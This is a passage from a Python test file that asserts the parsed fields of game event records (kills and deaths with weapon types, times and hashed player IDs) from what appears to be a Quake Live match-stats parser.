assert e[25]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[25]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[25]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[25]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[25]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[25]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[25]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[25]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[25]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[25]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[25]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[25]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[25]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[25]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[25]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[25]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[25]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[25]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[25]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[25]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[25]['DATA']['WARMUP'] == False # noqa
assert e[25]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[26]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[26]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[26]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[26]['DATA']['KILLER']['BOT'] is None # noqa
assert e[26]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[26]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[26]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[26]['DATA']['KILLER']['NAME'] is None # noqa
assert e[26]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[26]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[26]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[26]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[26]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[26]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[26]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[26]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[26]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[26]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[26]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[26]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[26]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[26]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[26]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[26]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[26]['DATA']['ROUND'] is None # noqa
assert e[26]['DATA']['SUICIDE'] is None # noqa
assert e[26]['DATA']['TEAMKILL'] is None # noqa
assert e[26]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[26]['DATA']['TEAM_DEAD'] is None # noqa
assert e[26]['DATA']['TIME'] == 88.6 # noqa
assert e[26]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[26]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[26]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[26]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[26]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[26]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[26]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[26]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[26]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[26]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[26]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[26]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[26]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[26]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[26]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[26]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[26]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[26]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[26]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[26]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[26]['DATA']['WARMUP'] == False # noqa
assert e[26]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[27]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[27]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[27]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[27]['DATA']['KILLER']['BOT'] is None # noqa
assert e[27]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[27]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[27]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[27]['DATA']['KILLER']['NAME'] is None # noqa
assert e[27]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[27]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[27]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[27]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[27]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[27]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[27]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[27]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[27]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[27]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[27]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[27]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[27]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[27]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[27]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[27]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[27]['DATA']['ROUND'] is None # noqa
assert e[27]['DATA']['SUICIDE'] is None # noqa
assert e[27]['DATA']['TEAMKILL'] is None # noqa
assert e[27]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[27]['DATA']['TEAM_DEAD'] is None # noqa
assert e[27]['DATA']['TIME'] == 88.6 # noqa
assert e[27]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[27]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[27]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[27]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[27]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[27]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[27]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[27]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[27]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[27]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[27]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[27]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[27]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[27]['DATA']['VICTIM']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[27]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[27]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[27]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[27]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[27]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[27]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[27]['DATA']['WARMUP'] == False # noqa
assert e[27]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[28]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[28]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[28]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[28]['DATA']['KILLER']['BOT'] is None # noqa
assert e[28]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[28]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[28]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[28]['DATA']['KILLER']['NAME'] is None # noqa
assert e[28]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[28]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[28]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[28]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[28]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[28]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[28]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[28]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[28]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[28]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[28]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[28]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[28]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[28]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[28]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[28]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[28]['DATA']['ROUND'] is None # noqa
assert e[28]['DATA']['SUICIDE'] is None # noqa
assert e[28]['DATA']['TEAMKILL'] is None # noqa
assert e[28]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[28]['DATA']['TEAM_DEAD'] is None # noqa
assert e[28]['DATA']['TIME'] == 89.5 # noqa
assert e[28]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[28]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[28]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[28]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[28]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[28]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[28]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[28]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[28]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[28]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[28]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[28]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[28]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[28]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[28]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[28]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[28]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[28]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[28]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[28]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[28]['DATA']['WARMUP'] == False # noqa
assert e[28]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[29]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[29]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[29]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[29]['DATA']['KILLER']['BOT'] is None # noqa
assert e[29]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[29]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[29]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[29]['DATA']['KILLER']['NAME'] is None # noqa
assert e[29]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[29]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[29]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[29]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[29]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[29]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[29]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[29]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[29]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[29]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[29]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[29]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[29]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[29]['DATA']['MOD'] == 'LIGHTNING' # noqa
assert e[29]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[29]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[29]['DATA']['ROUND'] is None # noqa
assert e[29]['DATA']['SUICIDE'] is None # noqa
assert e[29]['DATA']['TEAMKILL'] is None # noqa
assert e[29]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[29]['DATA']['TEAM_DEAD'] is None # noqa
assert e[29]['DATA']['TIME'] == 89.5 # noqa
assert e[29]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[29]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[29]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[29]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[29]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[29]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[29]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[29]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[29]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[29]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[29]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[29]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[29]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[29]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[29]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[29]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[29]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[29]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[29]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[29]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[29]['DATA']['WARMUP'] == False # noqa
assert e[29]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[30]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[30]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[30]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[30]['DATA']['KILLER']['BOT'] is None # noqa
assert e[30]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[30]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[30]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[30]['DATA']['KILLER']['NAME'] is None # noqa
assert e[30]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[30]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[30]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[30]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[30]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[30]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[30]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[30]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[30]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[30]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[30]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[30]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[30]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[30]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[30]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[30]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[30]['DATA']['ROUND'] is None # noqa
assert e[30]['DATA']['SUICIDE'] is None # noqa
assert e[30]['DATA']['TEAMKILL'] is None # noqa
assert e[30]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[30]['DATA']['TEAM_DEAD'] is None # noqa
assert e[30]['DATA']['TIME'] == 107.6 # noqa
assert e[30]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[30]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[30]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[30]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[30]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[30]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[30]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[30]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[30]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[30]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[30]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[30]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[30]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[30]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[30]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[30]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[30]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[30]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[30]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[30]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[30]['DATA']['WARMUP'] == False # noqa
assert e[30]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[31]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[31]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[31]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[31]['DATA']['KILLER']['BOT'] is None # noqa
assert e[31]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[31]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[31]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[31]['DATA']['KILLER']['NAME'] is None # noqa
assert e[31]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[31]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[31]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[31]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[31]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[31]['DATA']['KILLER']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[31]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[31]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[31]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[31]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[31]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[31]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[31]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[31]['DATA']['MOD'] == 'ROCKET_SPLASH' # noqa
assert e[31]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[31]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[31]['DATA']['ROUND'] is None # noqa
assert e[31]['DATA']['SUICIDE'] is None # noqa
assert e[31]['DATA']['TEAMKILL'] is None # noqa
assert e[31]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[31]['DATA']['TEAM_DEAD'] is None # noqa
assert e[31]['DATA']['TIME'] == 107.6 # noqa
assert e[31]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[31]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[31]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[31]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[31]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[31]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[31]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[31]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[31]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[31]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[31]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[31]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[31]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[31]['DATA']['VICTIM']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[31]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[31]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[31]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[31]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[31]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[31]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[31]['DATA']['WARMUP'] == False # noqa
assert e[31]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[32]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[32]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[32]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[32]['DATA']['KILLER']['BOT'] is None # noqa
assert e[32]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[32]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[32]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[32]['DATA']['KILLER']['NAME'] is None # noqa
assert e[32]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[32]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[32]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[32]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[32]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[32]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[32]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[32]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[32]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[32]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[32]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[32]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[32]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[32]['DATA']['MOD'] == 'SHOTGUN' # noqa
assert e[32]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[32]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[32]['DATA']['ROUND'] is None # noqa
assert e[32]['DATA']['SUICIDE'] is None # noqa
assert e[32]['DATA']['TEAMKILL'] is None # noqa
assert e[32]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[32]['DATA']['TEAM_DEAD'] is None # noqa
assert e[32]['DATA']['TIME'] == 112.9 # noqa
assert e[32]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[32]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[32]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[32]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[32]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[32]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[32]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[32]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[32]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[32]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[32]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[32]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[32]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[32]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[32]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[32]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[32]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[32]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[32]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[32]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[32]['DATA']['WARMUP'] == False # noqa
assert e[32]['TYPE'] == 'PLAYER_KILL' # noqa
assert e[33]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[33]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[33]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[33]['DATA']['KILLER']['BOT'] is None # noqa
assert e[33]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
assert e[33]['DATA']['KILLER']['HEALTH'] is None # noqa
assert e[33]['DATA']['KILLER']['HOLDABLE'] is None # noqa
assert e[33]['DATA']['KILLER']['NAME'] is None # noqa
assert e[33]['DATA']['KILLER']['POSITION']['X'] is None # noqa
assert e[33]['DATA']['KILLER']['POSITION']['Y'] is None # noqa
assert e[33]['DATA']['KILLER']['POSITION']['Z'] is None # noqa
assert e[33]['DATA']['KILLER']['POWERUPS'] is None # noqa
assert e[33]['DATA']['KILLER']['SPEED'] is None # noqa
assert e[33]['DATA']['KILLER']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[33]['DATA']['KILLER']['SUBMERGED'] is None # noqa
assert e[33]['DATA']['KILLER']['TEAM'] is None # noqa
assert e[33]['DATA']['KILLER']['VIEW']['X'] is None # noqa
assert e[33]['DATA']['KILLER']['VIEW']['Y'] is None # noqa
assert e[33]['DATA']['KILLER']['VIEW']['Z'] is None # noqa
assert e[33]['DATA']['KILLER']['WEAPON'] is None # noqa
assert e[33]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[33]['DATA']['MOD'] == 'SHOTGUN' # noqa
assert e[33]['DATA']['OTHER_TEAM_ALIVE'] is None # noqa
assert e[33]['DATA']['OTHER_TEAM_DEAD'] is None # noqa
assert e[33]['DATA']['ROUND'] is None # noqa
assert e[33]['DATA']['SUICIDE'] is None # noqa
assert e[33]['DATA']['TEAMKILL'] is None # noqa
assert e[33]['DATA']['TEAM_ALIVE'] is None # noqa
assert e[33]['DATA']['TEAM_DEAD'] is None # noqa
assert e[33]['DATA']['TIME'] == 112.9 # noqa
assert e[33]['DATA']['VICTIM']['AIRBORNE'] is None # noqa
assert e[33]['DATA']['VICTIM']['AMMO'] is None # noqa
assert e[33]['DATA']['VICTIM']['ARMOR'] is None # noqa
assert e[33]['DATA']['VICTIM']['BOT'] is None # noqa
assert e[33]['DATA']['VICTIM']['BOT_SKILL'] is None # noqa
assert e[33]['DATA']['VICTIM']['HEALTH'] is None # noqa
assert e[33]['DATA']['VICTIM']['HOLDABLE'] is None # noqa
assert e[33]['DATA']['VICTIM']['NAME'] is None # noqa
assert e[33]['DATA']['VICTIM']['POSITION']['X'] is None # noqa
assert e[33]['DATA']['VICTIM']['POSITION']['Y'] is None # noqa
assert e[33]['DATA']['VICTIM']['POSITION']['Z'] is None # noqa
assert e[33]['DATA']['VICTIM']['POWERUPS'] is None # noqa
assert e[33]['DATA']['VICTIM']['SPEED'] is None # noqa
assert e[33]['DATA']['VICTIM']['STEAM_ID'] == '6179638dba55b8f5d2da7838' # noqa
assert e[33]['DATA']['VICTIM']['SUBMERGED'] is None # noqa
assert e[33]['DATA']['VICTIM']['TEAM'] is None # noqa
assert e[33]['DATA']['VICTIM']['VIEW']['X'] is None # noqa
assert e[33]['DATA']['VICTIM']['VIEW']['Y'] is None # noqa
assert e[33]['DATA']['VICTIM']['VIEW']['Z'] is None # noqa
assert e[33]['DATA']['VICTIM']['WEAPON'] is None # noqa
assert e[33]['DATA']['WARMUP'] == False # noqa
assert e[33]['TYPE'] == 'PLAYER_DEATH' # noqa
assert e[34]['DATA']['KILLER']['AIRBORNE'] is None # noqa
assert e[34]['DATA']['KILLER']['AMMO'] is None # noqa
assert e[34]['DATA']['KILLER']['ARMOR'] is None # noqa
assert e[34]['DATA']['KILLER']['BOT'] is None # noqa
assert e[34]['DATA']['KILLER']['BOT_SKILL'] is None # noqa
